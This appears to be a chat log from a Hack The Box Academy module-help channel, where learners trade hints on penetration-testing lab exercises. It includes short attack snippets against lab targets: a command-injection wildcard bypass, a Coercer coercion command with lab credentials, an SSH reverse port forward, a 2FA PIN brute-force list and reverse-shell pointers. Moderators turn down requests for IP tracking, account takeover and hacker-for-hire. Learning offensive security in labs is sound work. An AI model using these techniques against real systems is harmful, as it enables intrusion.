#modules

soo the case here is
there is no "admin" existin on it anymore

you can literally just use a bootable to wipe the disk and get admin back but... anyways back to module topics

Where do we reach out about billing problems related to Academy?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Please how can I learn to track

has anyone done the advanced xss & csrf skills assessment? that can help please?

What do you want to track?

ohhh i see thank you!

Like number or ip address

https://whatismyipaddress.com/ip-lookup

How does it work

Enter the IP and click on the button. You will then see the details

you're asking for something illegal my guy

i suggest stopping there

stop. asking.

@tall iron if things have been stolen, contact the local police

Resuming my CPTS path (end of footprinting module), if anyone's interested to learn our way together DM me!! i don't mind if you're ahead or still at the start!!

What module is this even for?

its a private ctf...
im not supposed to ask here aren't i?

can't help you mate 😄

That would be cheating

understood🫡

Guys

How to Change a Microsoft account password with Password and Email

No Code or gmail

@astral vault @bitter needle

Please help

change the password

do u know ur current password or?

It'll ask for verification

Yeah I know the current password but m not logged in to gmail

contact microsoft support, we can't help you

Can someone do it for me

microsoft support

its fishy the fact that u dont have access to ur gmail acc

If I give u the email and The current password can u change the password for me

no

I am trying to log in to gmail it's asking for verification

havent given any recovery email?

I'll try

Nope

no trusted device?

Hello,

My name is Moksh and I'm a cybersecurity aspirant. I am in my early days of learning cybersecurity and I would love to know more about the cybersecurity space and the path to being an expert in this industry. I would love to pivot to cybersecurity. Any guidance(certifications or courses) towards my career path would be highly appreciated.

Thank you

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

best of luck 👆

Thank you for your response.

I’m genuinely interested in the offensive side of cybersecurity—particularly areas like penetration testing and ethical hacking. To build a strong foundation, I’ve been watching Professor Messer’s videos on YouTube covering CompTIA A+, Network+, and Security+, and I feel confident that I now have a solid grasp of the basics.

As I’m in the final year of my web development degree, I’ve been thinking that it would be highly beneficial to earn a recognized cybersecurity certification before graduating. Having a strong certification on my CV would not only validate my skills but also improve my chances of securing opportunities in the field after graduation.

It would be great if you could suggest any certifications that align with my interests and current level of experience.

Probs not best place for this @burnt talon this is for modules in the HTB academy...

#general #careers-and-certs perhaps ask in here? (not both)

I am really sorry for that

Okay I'll do that.

Thank you

no harm done 🙂

Hello group, hope you all are doing well! I am doing the exercises on the Attacking COmmon Services - Medium. I got stuck at a point so I checked the sollutions and in the solutions it says to add the subdomain int-ftp.inlanefreight.gtb to hosts and then NMAP it. and it shows on their solution nmap that there is an FTP on port 30021 . But its closed on my VM, I assume maybe the service didnt power on correctly and would require a restart of the VM but just was curious if someone had the same experience or am I missing something

its not first time ive seen that on few modules, not done the attacking common one yet but if restarting the VM doesn't help, its most likely a bug -- report in #1234357888114364508

others can comment on it then if they think of a reason it could be happening... best way to get feedback I found

Yea will do it now, probably a one time thing, i dont assume no one reported it if it wasn't . THis would def suck if happened on the exam, it took me an hour of enumeration until i gave up and saw that it was something outside of my control haha

Has anybody done the xss and csrf module, Im struggling to get my sqli payload to work on the last endpoint any help would be much appreciated!

if at first it doesn't appear, restart and restart again

Why dont you just check the sollutions part? if you just want a hint, dont read everything just a pointer or two to help you out. Its way faster then waiting here for someone to give you a hint here

I bought the module, dont have annual, I can read all the data at the fuzzed endpoint, I just can't get any sqlinjection I've tried everything, stacked queries, union, order-by etc.. everything

Hey, are cURL requests anonymous ?

No,

What do you mean by anonymous

why'd you even think that

generate the most amount of logs in the most obvious way more like it

Can they be traced by the server?

yes

oh alr

ty

ohh someone has been curling something that they shouldn't have 😉 hahah

definitely not

just asking 😳

tbh it'd be hard to unintentionally break something with curl

Either way. Please keep it on topic. This is the channel for module support.

alr ty

can I dm you sparkling

I'm not able to help with modules at this time

ok

even if the operation is silent?

All requests that arrive to the server can be logged. This will include the ip that it arrived from/is going to

the silent just stops error messages from showing and other ouput, any request you make can always log your traffic

oh ok thanks

hi

is this the right channel if i have technical problems with my module?

erratum I think ?

@storm elk

?

what's erratum?

@prisma wing if you are applying for a job and got a task assigned, don’t lie and do the task yourself.

Asking for help isn't lying, how fuckin rude

Well; it’s your task

We are not here to help you solve a task for a job interview. That would be cheating.

I understand your point, but asking for help isn't the same as cheating. Sometimes, discussing a problem or getting clarification on specific aspects of a task can help me approach it more effectively. It's about learning and improving, not bypassing the challenge.

Well, it’s your task for a job interview. You should be able to do it yourself. Check out the Wordpress module on Academy. Either way, this channel is not the channel for your question. If you want access to general chat, read and follow instructions of #welcome

It’s 3 steps.

I'm doing the pentesting in a nutshell module and I tried to wget linpeas from github on the virtual machine on my hackthebox account, but everytime i try to do that the connection times out.

Not currnetly as i have not be taught how to. Thank you, i will have a look at the wordpress module. So can i ask the same question in general then?

People will more than likely tell you the same as I did.

Okay noted, I'll try thanks again

Hey

Help me I can’t stop listening to early 2000 dad rock someone please save me

This isn't the place for that

whgere is the place for thag

Hi

having some trouble with
Introduction to NoSQL Injection
Skills Assessment II. Anyone around for a pointer?

dm me

Windows lateral movement windows management instrumentation question three. Use WMI to get a reverse shell on SRV02. Helen is not even a admin with WMI permissions. Wondering if I should fuzz her password against the list of users and go that way. Not sure why the lab showed an example of somebody without those permissions to begin with.

Does it give you a "Pwn3d" in netexec?
You can run a PS b64 rev shell if you can execute commands remotely

Netexec for .52 just went and did nothing from what I remember . Sorry I walked away

did you find the anwser ?

I can try it in a couple of minutes. Just finishing another exercise.

Taking a lunch break, but I’ll try again

please help me i have read 3 time the module and i don't find the aswer :module/80/section/837 broken authentification What is one prominent issue with passwords?

This works. You can use whatever WMI tool you'd like

I am in trouble with the target of the "Packet Inception, Dissecting Network Traffic With Wireshark". I can connect to the machine with xfreerdp but it shows nothing, I mean it displays only a black screen. I searched about it in old log and found I should press a space key in the black screen but it does not work for me. Could you give me some advise?

Please ignore this post, I realized that the blackscreen is a wallpaper of a linux VM. I misunderstood it was a Windows VM.

Anyone working on the Penetration Tester module and want to learn together DM me!!

@rustic sage This channel is for discussion of the various modules on HTB, take it to #general please. Follow the instructions in #welcome to access the channel.

Thank you W1ld

Hi. Someone knows if there's any kind of issue with 'inlanefreight.com'?; I cant access it

Module: whitebox attacks
Section: client side prototype pollution

Hello everyone!
Got stuck for a week around on this task.
Can I have some help?

from my cell phone, the website works

I’m having trouble Copy>Copy after I authenticate in the GET exercise in web request in order to find the flag

You can DM

DM?

No answer

What module is this for?

Web request module in Bug Bounty path

Is anyone working on Bug bounty

tell us what issue are you facing

I'm having trouble installing some tools. It's the attacking common applications module. The guide teaches "sudo pip3 install droopescan" and I get an error "error: externally-managed-environment" . There are other tools also, I cannot install pip3 tools for some reason. git clone doesn't work either btw, I cannot install the "requirements.txt" and the tool won't run at all.

i havent done the module but i have fixed pip erros before
there are usually 2 ways to do it
using pipx (this is global)
and using venv (using this you will need to go inside a python venv everytime and activate it)

for now intsall pipx and then try to install droopscan

I managed to install using pipx but it doesn't work either! Why I try to run the tool it says some modules are missing, so doesn't work either.

did you try to install the missing modules 🤔

When I used "sudo pipx install droopescan" I couldn't even use the tool as it installed itself in the ROOT directory. When I used "pipx install droopescan" I try to use the tool but some modules are missing. When I try to install said modules, it won't let me I think it just gave me errors

https://github.com/SamJoan/droopescan/issues/72
it seems like an issue with the tool

wait here i guess someone may know :)

That's too bad, I say the course material should be re-evaluated :/ Do you happen to know any other Joomla scanner I could install with apt ?

i will try to see if i can run in venv
give me a sec

Alright, thanks a lot, man!

venv doesnt work either

🪦

So it's the tool itself that is broken?

That's a shame :/ I've been banging my head trying to get it to work. If you happen to know any alternatives, please tell me 😄 And the material needs urgent updating.

Hello,
I have completed all but 2 of the questions for Android Fundamentals. (1) question 2 for Android Emulators: Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test).
and also
(2) question 2 for the Android Skills Assessment: Find the UID of the application com.android.settings. Use the command adb shell ls -l /full/path/ to inspect the file permissions and identify the application's UID from the output.

request assistance.

hey I'm having trouble with:
"command injections - bypassing blacklisted commands" https://academy.hackthebox.com/module/109/section/1038
"Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found."

(also not really sure how much I'm allowed to share of my progress for means of getting help with this?)

I am able to read the files in the home folder but nothing comes back for flag.txt

you can list the flag.txt?

some times, in command injection, you can use *, so instead of execute cat flag.txt you can execute cat flag*

it sometimes help me in this situations

Are you looking at /home/ or /home/user

😉

Hello,
I actually try: https://academy.hackthebox.com/module/77/section/728
and I can't access to https://10.10.10.121 website on my workstation somebody can help me

@shadow grove don't spoil the module content

That ip is just an example: you won't be able to access it

It's there to show you can use the ip in the query, not just a domain name

How do I ask a question without asking the question?

The target you can access is the 10.129.x.x spawned target above the question

Are we getting "missions" on Academy now!?

The issue is that module is a walkthrough in and of itself. The only thing I can say is try resetting the lab, or making sure that the domain is in your hosts file correctly

I'll never be able to finish the whole content 🤦‍♂️

Thank you !

Footprinting Module> Oracle TNS Challenge/Skills. When running the .SH provided to download/install SQL Plus, it doesn't appear to install it, the tool itself despite I can see the xcript working. I woud like to finish the lab but I know this tool is needed.

v

run the script line by line instead of as a script

i've had issues where the tools/dependencies don't properly install

I'm working on the last part of the Advanced XSS & CSRF module's skill assessment.|| I can query the API but I cannot get a working injection other than a "something went wrong"||. Could someone help me on that?

@round parrot please refrain from spoiling info on labs from modules above tier 1; your screenshot contained passwords and such.

.

guys how can i have access to active machines channels please

read and follow the #welcome instructions

ok this then

a lot of broken modules or not updated for a while

still for some reason i can connect with ldapsearch with the creds but not with following the tutorial. it fails..

You're running with sudo yeah?

yes, tried it with and without

Best to always include the module and section. Your error seems clear though, it says connection refused.

lol. yes it does. quite clear. module Unconstrained Delegation - Users Kerb Attacks. But it shouldnt. since i get connection with ldapsearch. maybe the twist is that i cant add a record with that user..

Was looking at 'Python Library Hijachking'.
https://academy.hackthebox.com/module/51/section/1640

I think there is a mistake. It is said, if the SUID/SGID is assigned to a python script than we can do what we want (Wrong write permissions section)

But it's not the case, suid are ignored on scripts and in the box itself. If you changed permisions and put a SUID on the python scirpt it doesn't work.

Even having a SUID on the python interpreter isn't working

The real and only method is having sudo permissions on the script

sudo

yeah i know, but the course is saying otherwise

you may be right. you should submit this to #1234357888114364508

Good evening. Working on Shells and Payloads - the live engagement. Within the first box you have to rdp to, i have minimized terminals that are running commands. I cannot figure out how to get them to be visible again. I've tried Super +W but my laptop tries to respond, and the vm does not. i swear i only show up with dumb problems.

There's a top task bar that should show them you also should be able to alt tab

Thanks. The top Taskbar isn't showing any of the things I minimized, and alt tab just tries to switch windows on my laptop. 😦

Maybe check the other workspaces theres a bunch of squares on the task bar they're different workspaces

Hint: think about what UID stands for and you should get the answer from that.

need help w dis in windows fundamentals module

i tried dir c:, tree c:, but im not sure wt im supposed to actually do

whats "non-standard" supposed to mean

can any1 help?

non-standard = directories that aren't normally there

in this case, would it be smth like searches or links??

that's not the c directory though 💀

huh
it is?

dir c: gives directory for c drive right??

dir c:\

.
right

how do i check contents of a directory

in c

@waxen totem

use the knowledge you gained from the section

im trying 😭

👆

did tht along w/ the directory name

i need the file contents of a directory

wdym?

i tried dir c:\ Academy

i got the directory im lookin for
its academy
but i need contents of da flag file stored in it

just use the command bro why you making modifications?

.

so get the contents

how?

thats the one i need

i tried everythin in section

have you tried: using the file explorer?

k i got name of flag file il do it now thx

apparently the ps command for dat was dis....i did smth similar but i think i missed smth

n then yes file explorer

hey, need some help with the OnlyHacks lab

is this the correct place?

no

read and follow #welcome to access more of the server

#challenges

i thought i saw where approximately how much time each module took. where can i find this information again so i can plan out my days in advance?

edit: i found it in modules if anyone else was wondering

broo in linux privilege escalation/logrotate how do you ||force logrotate||?

i tried using -f
permission denied (obviously)

im not sure what else to try

ive tried a few other ways i saw on google but nothing worked

I wouldn't base it completely off of that estimated time

there are modules rated for 8 hours that I finished in 2, while there are modules rated for 10 days that I finished in 20

i understand. it's just nice to have a rough estimate

i'm just setting aside a few hours per day during/after work

but i have a goal in mind for when i want to finish the pentester path

should i just wait?

hey in Foot printing module I'm having trouble cracking the hash

in IPMI section

you can remove admin: or add the -username flag (might need two -s)

yea got it changed to 7300

and it worked, thanks!!

Module: Understanding Log Sources & Investigating with Splunk Section: Skills Assessment "Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe" I was able to get the answer but can someone DM for a quick sanity check regarding the question and possible ways of finding the solution easier? 🙏🏿 🙏🏿 🙏🏿 🙏🏿

Hi Guys has anyone completed hard lab of Enumerating Network with Nmap?

figured it out never mind)

I'm still looking for help in the last phase of Advanced XSS & CSRF module's Skill assessment. I got a tip from a helpful user but I'm not sure I'm still doing it correctly. Is the last phase supposed to be ||boolean-based||? I'm trying to be methodological in my approach but at this point I think I'm misunderstanding something, because my current approach is testing other skills to what the actual module is about.

No.

<@&861185840277487616>

I have the original short link they sent

Guys I started Tier 0 Meow and completed it, but can someone explain, what are open ports? What is 'nmap'? I felt like I got thrown in without some background.

It was fun but just trying to understand the inner workings

if you are unfamiliar with these terms, you should probably look into doing the Information Security Foundations skill path on HTB Academy

Ty

Now that you had a taste of it, you are ready to learn. That is the whole point

hey I am on the Pivoting, Tunneling, and Port Forwarding module,

I am trying to utilize a reverse shell with ligolo-ng,
I managed to move the reverse shell to the internal server but I cannot manage to gain a reverse shell from the windows host through the ubuntu server to my attacker host

I am a bit confused, is someone availabe for a little help 🙂

Dm

Good to know, thank you!

ey guys Good Afternoon, I need bit help here. Has anyone arrived here?

this is the last exercise of AI

hello guys
im doing the introduction to windows command line
and im facing some stupid issue

options in powershell have a colour similar to the terminal background ||at first i thought that options were invicible lol||

how to change the colour of the terminal backgroud

so the options become easy to read

It's either under
Terminal or view

It's been a minute

It's mostly due to jumping to ps from another session which is causing some issues

eee marciello I'm almost going to complete the module 😉

Who's marciello?

you xD

Thats not my name? No "o" in sight

Module: AD attacks & Enumeration
Section: Skill Assessment 1

Question: submit cleartext password for t***** user.
I compromised the domain admin and got the final flag, but can't get cleartext password for that specific user, anyone available for a hint?

Research for: ||NetExec Low Privilege Modules||

Can I dm you?

Sure

Hello everyone,
I just finished learning all about networking, but now I’m not sure what to move on to next. I’m new to the cybersecurity space and don't know anyone in the field yet.
Can someone please guide me through the process and suggest what my next steps should be?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

actually your right
i opened a bash terminal then ssh to the windows target
didn’t think that would cause such a problem

https://tenor.com/view/gojo-gojo-satoru-dancing-jjk-jujutsu-kaisen-gif-11279010997642251415

it's joke brother 🙂 already I have the module ready

almost

hi everyone! I've got one question - currently i'm at pivoting & tunneling module. How exactly rpivot works? is it only forwarding webserver to my attacking host (kali)? or can i even rdp to this victim server which contains webserver?

I kind of thought that it shouldn't. Would you mind if I DM you about this (are you familiar with the assessment?)?

Hey, i am on PIVOTING, TUNNELING, AND PORT FORWARDING - Remote/Reverse Port Forwarding with SSH section

I am trying to use ligolo-ng in order to get a reverse shell on the windows machine of the user victor (172.16.5.19) is not connected to the internet and there is no open port within it
this windows host is connected to the web01 ubuntu jump host

In the module they're doing it with ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
But I am wondering how to utilize it with ligolo

If someone can please assist me I will share screenshots to be more clear.
Thanks 🙂

yesssss omg I manage to do it after 5 hours

I guess typing my thoughs helps

can the flag be a word/sentence? as in:
HTB{word1_word2}? I'm new here ^-^

the flag is the whole HTB{word1_word2}

the flags I've found so far look like a string of random characters, but are there flags that look more like sentences/words then? Thanks in advance!

yes 🙂

hi, i need help with (Attacking Thick Client Applications)

a flag could be also like
Em0r!4L!_G00d_LUCK 🙂

Thanks! ^-^

Hi, can anyone help with skills assessment on injection attacks? I found how to execute js code and read files, but I have problems at the xpath injection stage.

ey guys how long have you been hacking?

I am on Shells & Payloads - The Live engagement, question 5. The remote host install of Metasploit does not contain the exploit, and there is no internet connection to get it from exploit-db. Am I missing something?

Probably better to ask in #red-team or something as Ligolo isn't covered in modules.

hi I'm trying to make sure I understand this section. who can I talk to in order to understand it better? I think if I explain it to someone else I will understand the material better. I also have some questions about the material.

can I DM someone? I don't need help with the questions as of right now

I just need help understanding the section

I completed two questions of section doing third

gonna get flag and then reread section

hi the section is telling me to login to the server to transfer a file to it via a specific protocol but the server isn't listening on that protocol

services don't always run on default ports

ok thanks

If rdp is open: sure

You're missing something; it's there. You can just use it

well, I ran some nmap scans and its not getting me any decent results. do I need to do a fancy scan?

i have no idea what you need to do

You didn't say what module and section my guy, so help is gonna be sparing

@fathom pendant That worked. Why would it be in there, but not come up in a search?

That i don't know

But it does exist

Web Server Pivoting with Rpivot

And I mentioned it earlier

That context was long lost

Hi!! Guys
Can speak in spanish?

This is an English only server; see #rules

Srry. Muy bad

I'll ask again later

I can't resolve my 1er lesson
[us-academy-3]-[10.10.14.169]-[htb-ac-uxkrp0utzq]-[~][*]$
Find IP:PORT

well find isn't an ip/connection command

but what academy module is this for?

hey everyone , i need help i am doing cpts and now i am in chapter 2 topic public exploits in which i have been given question. but i am geeting this error using metasploit when i hit check:
" The service is running, but could not be validated. Authentication to Wordpress failed."
can anyone help me with that

Best to include the module and section you're doing

https://academy.hackthebox.com/module/77/section/843
here it is

hello I was thinking something from the Penetration Testing Process
Page 2
in Academy Modules Layout you have to do just the fundamental modules it suggests Before moving on right ?

spent my entire day still coudn't solve this

problem

yes just have a look on them you will study those in detail later , rn follow the sequence

Ok so just read the page for now

Thought maybe it was asking the fundamentals, I guess I will do them somewhere in cpts path

@desert plume No one is going to outright tell you the answer. You can ask for a nudge if you're really stuck but you need to explain without spoiling content from modules above tier 0.

the answer is the flag lol im just asking how high the pin code is lol i dont want the flag

still applies

And those go against the rules too, no posting content above tier 0.

there hows that ? how that code look then

thats is they give you

Hi. Im doing attacking enterprise network. when I try to upload zip from sharphound to bloodhound it just keep loading forever

As I said before, don't post content from modules above tier 0 it's against the rules. Simply ask your question without posting content.

It can be a Malware or It might be a genuine family man. @viscid osprey Referring to your question in #cpts

its not loading at all

Try running bloodhound with sudo

You need SharpHound version that is compatible with BloodHoundGUI

Try a legacy one

Which version of sharphound?

Try bloodhound-python or sharphound v1.1

i used the sharphound latest one as nt/authority on a computer object. I will try and update

OK. I'm working on the Final assessment for Broken Authentication. || I've gotten to the point where I have to brute force the 2fa pin. I know what information I need to filter out. I've generated the pins with 'seq'. However nothing is hitting for me. || Have I missed something?

I've used seq -w 0 9999 to generate the list of possible pins.

hi

@rustic sage Hi. Read the #rules and follow the instructions in #welcome to gain access to most of the server. You can chat in #general after that.

hi again. I tried with sharphound v1.1 it didnt work either. my bloodhound version is 4.3.1

when running with sudo stuck here.

Hi there

https://github.com/SpecterOps/BloodHound-Legacy/issues/700

Thank you ❤️

All gs

do you think using AI to help with learning, like reverse engineering code, is frowned upon?

guys, I'm in footprinting medium assessment and stuck

at a point i've got the access to target and 2 required creds

unable to move forward from there

Hey everyone, i am on GETTING STARTED MODULE , Using PUBLIC EXPLOITS SECITION. I am stuck , when i exploit target host using msf it says " the service is running but cannot be validated" means plugin require authentication but i have done all the things to get username and password all in vain. can some body help me how should i get this done

Wireless network in network fundations. It’s not accepting 2.4GHz and I can’t close the module. Yes it’s tier0 and don’t know why it’s like this

I haven't worked through the module, so unfortunately I can't help you.
But if you have a question about a module, it is always a good idea to specify in which module, in which section and with which question you have a problem. This is the best way to find someone who can help you.

can you assist me in my problem kindly

Perhaps you have used the wrong exploit

thank you

didn't they provide username and pass in the page itself?

just be sure you read through completely they m8've mentioned some creds to use

Hello guys,
I'm practicing the last assessment in the password attacking module, when trying to download the backup.vhd file, I'm always getting a timeout, the ping to the server is OK, I've
checked the tutorial for this assessment, and it should work. any idea? I'm using my own attacking Kali VM

I repeated the assessment quite recently. It timed out on the first time, but it then worked somehow.
If it was a SMB share, you can try

mget *

If persists, try a TCP VPN since that file is quite big

Great, I will try it, a quick question, if I want to go to CBBH/CPTS exam, how could I know which TCP/UDP VPN should use?

TCP is a safe bet, but someone who has attempted the exam can answer it better. I'm yet to sit the exam

I see, thanks!

Active Directory PowerView --> Enumerating AD Users --> Find the second user with a password in the description field. Submit the password as the answer. -->||Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}|| but none of the output is accepted as an answer. What did i miss?

Is the VPN extremely spotty for anyone else, I can connect but get booted off after a few sec?

thank you!

No probs here.

the flag is in your screenshot.

deleting due to spoilers

Ah alright it was that one

Okay, thanks!

Need some serious help... Firewall and IDS/IPS Evasion - Hard Lab. Struggling with this one a LOT. I assume I need to get to a point where the port is open as step one right?

source ports are your friend

lol, I gathered that in the first two minutes, it's the next four days that has me struggling 😄 Thanks for the confirming that I am on the right track though 🙂 It is way to easy to overthink

the reading is important; maybe revisit that on tactics on what to do 😉

Hi - in Active Directory LDAP module, LDAP Overview it disucsses how to enumerate using ldap queries for " This query searches the domain for all administratively disabled accounts."

My question is - does this query and its output have any significance or is it just for demonstration purposes? I cant understand why this output would be something you would have interest in.

a disabled account can be interesting; but it's an example of what you can do

it also helps if, for example, you pilfered creds to ensure the user is active

Thank you, helpful.

I'm doing Linux Privilege Escalation - Logrotate and one of the preconditions for the exploit, logrotate running with elevated privileges, doesn't apply to the machine. The config file listed in the tutorial that sets the su for the process is not visible to the user I'm given. If somebody is familiar with this module: can I get a hint? ty

i had 0 issues with using logrotate to copy the file

I ran the logrotten exploit, it apparently did it's thing, the "logrotate -f" command I used to trigger the rotation returned a permission denied error and I didn't receive the reverse shell.

Am I missing a step?

are you sure you're messing with the right file, first and foremost

Anyone a hint?

I found him but the found pass is not accepted as answer

I can't say I'm sure, I've tried 2 files. That's a good hint, I'll keep looking

was the most obvious of the two 🙂

Thank you!

i deleted the message previously for providing the direct hint; i suggest taking to dms for further help

are you sure you didn't accidentally copy additional whitespaces?

i did retype it, copy/paste. Didnt work.

That was the answer for me. Did you include the ? at the end?

Yes I did

Then try refresh the page and enter the same answer. I found that if the page has been open for too long it will say the answer is incorrect.

Didnt work, but! Logging out and in did work.

Thanks...kept me busy for more than a hour 🥲

do you want to know how to keep an idiot busy for a while?

Yes <<<
No
Do you want to know how to keep an idiot busy for a while?
...

Shouldnt the uid be a f integer !?

hello i am also stuck with MODERN WEB EXPLOITATION TECHNIQUES - SSRF Basic Filter Bypasses

Can you help ?

Thank you for the help 🙂 I had no option but to google it though. Found a post where people were saying it only works on the pwnbox 😦 Is this normal? Should I just be using the pwnbox for all networking stuff?

it absolutely doesn't "just work on pwnbox" lmao

i've gotten the answer on my own vm plenty

sometimes it's also a bit of patience after you identify the right port

I have a mundane problem... I'm often getting my solutions right, but not the expected end result, this is usually because I choose the wrong local IP's to connect to my target. Just now, I was working on the shells module with the live engagement, on the first host, i essentially did everything right, but i picked the wrong LHOST up to 3 times, which made me doubt what i was doing was the right thing. How validate I'm using the correct ip from ifconfig -a when connecting to my target?

Send me a DM

does the ip match the range of what you're connecting to

that's the most simplistic answer i can give

the live engagement has you attacking targets on a separate internal network that don't have access to the 10.129 range

that's the answer i needed

I was trying to use the local ip, the ip i got from the assignment, another one, but i was doing it aimlessly. using the correct IP range is actually a reason why to pick A over B 🙂 Thank you Marcie! that helps me a bunch

Yeah, another lesson.... I think the pwnbox just happened to work because it was a fresh restart. But then I reset everything, waited 10 minutes and tried again with the same results on both. The results just seem kinda random

Got it: need to "sudo -s", then run wpa_sycophant.

hey guys I am new here. anyone can help me get through Academy - DNS Zone Transfers? I found internal.inlanefreight.htb subdomain with DNS records. I tried every possible count they would want but without any success it always says incorrect answer. I tried 12, 11 you name it so if anyone knows how to get through this thingy I would be grateful.

Hi Where is the right room to ask help about labs ?

quick question on htb academy. when you finish a section and you go to the next ?module? / ?section? where do you see how long htb thinks it will take to do that module / section?

#boxes
If you have no access, read and follow #welcome

HTB only specifies times for the entire module, not for individual sections.

ahh ok. thanks!

If you need help with a module, it is helpful to specify the module, the section, and the question you are stuck on. Without this information, it will be difficult for anyone to help you.

how do you get access to speak in the htb off-topic general channel?

Hi thanks for the prompt answer. I am not sure what it was but now it miraculously works even on the main domain without trying subdomain first. Not really sure if there was some issue with the target machine or what but it just started to work. The question was regarding to Q1 under Academy - DNS Zone Transfers module.

Where I can see my account Identifier on HTB settings?

What is the name of the module?

follow #welcome

I follow

I think it was this?? Information Gathering - Web Edition

It say go to my setting my profile I dont see account Identifier

https://app.hackthebox.com/profile/settings

on the right side

thanks!

Hey guys

This channel is for discussion of the various modules on the HTB platform, not for help with school.

How do i get permission to post in general? @cloud urchin

You have to follow the instructions in #welcome to gain access to most of the channels

Only two weeks in, but my advice is to completely forget about how long it should/would/is taking. Been in IT for 25 years, and this course really is a journey and not a destination 😄

Hello, I'm doing the using web proxies module and the spawn a target of a submodule seems broken, I try to ping/curl into the ip and it doesn't seems to work

Are you selecting the correct port?

hi , anyone can help? I am stuck at footprinting IMAP/POP3. The question is to Find the admin email address..

yes, yesterday I was progressing on the module and now spawing target doesn't seems to work

but I taget spawning work for you it means that is something on my pc

try to list all folders inside imaps ; )

it work on the vm provided by htb but not on my pc

anyways I'll do it on the vm

Hi

So confuse

@inland oak Please take care not to post content from modules above tier 0

😦

helllo guys
why is this not working

PS C:\Users\ahmad> Get-Alias | Where-Object { $_.Name -like 'Get-Content' }
PS C:\Users\ahmad>

i mean i know the name here would be something like cat since its an alias
but

PS C:\Users\ahmad> Get-Alias | Where-Object { $_.Name -like 'cat' }

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Alias           cat -> Get-Content

PS C:\Users\ahmad>

here cat is the name but what is get-content
is it just a normal text

Hii

Are you looking for a Windows command that does what 'cat' does in Linux? If so just use type

That's right 👍🏻

its a simple question in one of sections in intro to windows command line
it just asks what cmdlet is cat alias of

beside the question i am curios why this didn't work

Get-Alias lists all aliases. Get-Content isn't an alias, it's a full cmdlet which is why you got nothing back. Cat is an alias of Get-Content, which is why it returned something for you.

yeah thx

Can someone help me get started?

I’m new and I’m trying to learn to code so help is appreciated

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ehm hi in the Sliver module the error:
"rpc error: code = Unknown desc = implant timeout" happens a LOT i searched this channel a lot of people are facing it NO ONE suggested any solution, anything new? i cant execute binaries or aliases and this is annoying T_T

Anyone available for my question #modules message ?

Footprining Module> Footprinting Lab-Medium. I'm trying to mount NFS share, but it just freezes and does this. I've made the directory on my attack machine.

Eventually times out with "connection refused". I can see there is an available share..

sudo is not root

Login & password de mrRobot plz ❤️

What?

Don't you need to specify the volume? ... nfs <target_ip>:/<volumeavailable> ...

Vulnhub mrRobot can't login

I've tried that.
sudo mount 10.10.15.170:/TechSupport ./target-NFS

10.10.15.170 being my attack machine.

IP should be target, just edited.

This channel is for discussion of HackTheBox's modules, not vulnhub stuff. Maybe ask in #red-team or something. You'll need to verify your account by following the instructions in #welcome to access other channels more appropriate for questions like that.

Srry my bad

read again why it works. sudo and root are not the same things

So I need root permission to map this? I'm new to all of this so all I have to go off of is the footprinting section and trying to google the right answers here.

hi it doesn't give me an error but I cannot connect via ssh on the Web Server Pivoting with Rpivot section of the Pivoting, Tunneling, and Port Forwarding module. This is for the last question. I tried nmaping it but that failed too because it scans all 1000 ports and none of them are open. I want to scan all 65,535 ports but I'm scared it will take forever and I don't know if that's really the right way to go because it says to SSH into it. Do I need to do a fancier nmap scan like a FIN scan or something?

hopefully I'm not spoiling anything

module link?

Sounds more like your target died, you're not on the VPN, or you're using the pwnbox at the same time while being connected to the VPN. Can you ping the target?

Algorithm Confusion anyone around i can DM for help ?

when i input the pem key in cyberchef i get invalid token

That sounds like a #challenges question, not a modules question. Unless that's a section in one of the modules

thats a section in the modules

Whats the module name then?

Algorithm Confusion

in the Attacking Authentication Mechanisms

I’ll try again after I get lunch but good idea. It could have something to do with the wifi I was on

But good point. Thank you for the suggestion. I’ll try soon.

hey peeps, I am having some issues with coercing in order to get the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.

I am looking at module/232/section/2522. I know I am doing the correct command, but there seems to be some issues where lab env is concerned.

Command:
Coercer coerce -t 172.16.117.60 -l 172.16.117.30 -u 'htb-student' -p 'password' -d inlanefreight.local -v --always-continue --filter-pipe-name '\PIPE\lsass'

When I run my command, everything works fine, but no error shows in the form:

'[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.

Can someone help me with Firewall and IDS/IPS Evasion - Hard Lab? I've tried several types of scans, and I only ever find 2 ports, or the scans will take hours (The machine won't stay up long enough) I've tried adjusting the delay, max tries, etc. I have enumerated the http service I found with no luck. Been stuck on this for a while.

Source ports are your friend

Ill look into that, thanks

Check the reading; it refers to source ports and reasons 😉

Nice, thanks 😎 I think I'm on the right track now

@atomic moss this isn't a hacker4hire server; see #rules

Anyok

I have to say sorry. Earlier, I was asking why I couldn't connect to the spawned target. I forgot that I had configured my firewall to drop everything except some ports. 😛

hehe

Hey guys I’m switching fields into cyber security from medicine and my old laptop has died on me. Are MacBook pros suitable as an entry level device in cyber?

They're fine. But you may run into tool issues as most tools are built for amd x86_64 chips, and most recent mac pro chips are m1/2

Are there work arounds for this issue?

I mean you'd just have to find comparable tools

As that's more of a cpu level thing than it is a distro level thing

Different instruction sets

Awesome. Thanks for your help

I'm restarting my spawned target for the umpteenth time now for the Common Services Attacking FTP module. I know this one gives everyone a problem. It took like 5 retries for me to get the first non-standard port, and then i exhausted the users lists and password lists. I can't connect to the one non-standard port I've found anonymously (i've tried...lots). Looking through other people's posts it seems like there should be a second non-standard port open. I've tried a lot to find the other non-standard port, including looking for some specific ones, and I can't get a box to spawn that has a second non-standard open. Has this lab been updated or do I really still need that second non-standard port open. feel free to DM me if this is getting too into the weeds!

I did find one of the users (that answered question 2) and suspect that there is a second user; I've tried the provided password list with both usernames and got no dice.

